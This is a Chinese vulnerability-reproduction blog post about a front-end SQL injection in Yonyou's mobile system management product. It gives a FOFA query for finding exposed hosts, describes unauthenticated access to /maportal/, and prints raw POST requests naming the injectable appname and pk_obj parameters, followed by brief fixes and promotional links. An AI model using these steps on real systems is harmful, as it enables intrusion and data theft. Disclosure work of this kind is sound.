导读
主要分享学习日常中的web渗透,内网渗透、漏洞复现、工具开发相关等。希望以技术共享、交流等不断赋能自己,为网络安全发展贡献自己的微薄之力!
用友移动系统管理存在前台SQL注入漏洞,攻击者可通过此漏洞获取敏感信息,从而为下一步攻击做准备。
1、fofa
"移动系统管理"2、界面如下
3、直接跑目录
4、存在未授权访问
访问发现/maportal/存在未授权访问,如下
5、存在sql注入点1(appname参数存在隐患),随便输入1,直接点击查询数据包如下
POST /maportal/appmanager/init HTTP/1.1Host: 127.0.0.1Content-Length: 40Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://127.0.0.1:5080Referer: http://127.0.0.1/maportal/html/paramsetup/paramsetup.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=D298606CA51929CE86EA83C32FA39139.serverConnection: closeappname=1&sys_type=&loginmode=&joinmode=
6、存在sql注入点2(pk_obj参数存在隐患),点击新增,直接抓包数据包如下:
POST /maportal/appmanager/save HTTP/1.1Host: 127.0.0.1:8989User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 202Origin: http://127.0.0.1:8989Connection: closeReferer: http://127.0.0.1:8989/maportal/html/paramsetup/addParamsetup.html?pk_obj=nullpk_obj=1
7、该产品除了两处sql注入外,还存在任意文件读取和任意文件上传,详情如下:
https://wiki.freebuf.com/front/societyFront?invitation_code=2f34044b&society_id=107&source_data=2
1、对相关页面进行严格的访问权限的控制以及对访问角色进行权限检查!2、过来用户输入的特殊字符。
因为很多未公开或者小范围公开的漏洞不能直接发公众号,所以后面部分漏洞会直接整理发表在知识大陆,目前进入需要9.9元。收费主要是想参与freebuf知识大陆活动(再说了,这点钱还不够我吃顿饭),链接如下:
https://wiki.freebuf.com/front/societyFront?invitation_code=2f34044b&society_id=107&source_data=2
加入帮会后扫描二维码加入群聊:
京信通信系统中国有限公司CPE-WiFi存在任意用户添加&命令执行
泛微e-office OfficeServer2.php 存在任意文件读取漏洞复现
原文始发于微信公众号(五六七安全团队):用友移动系统管理存在前台SQL注入漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论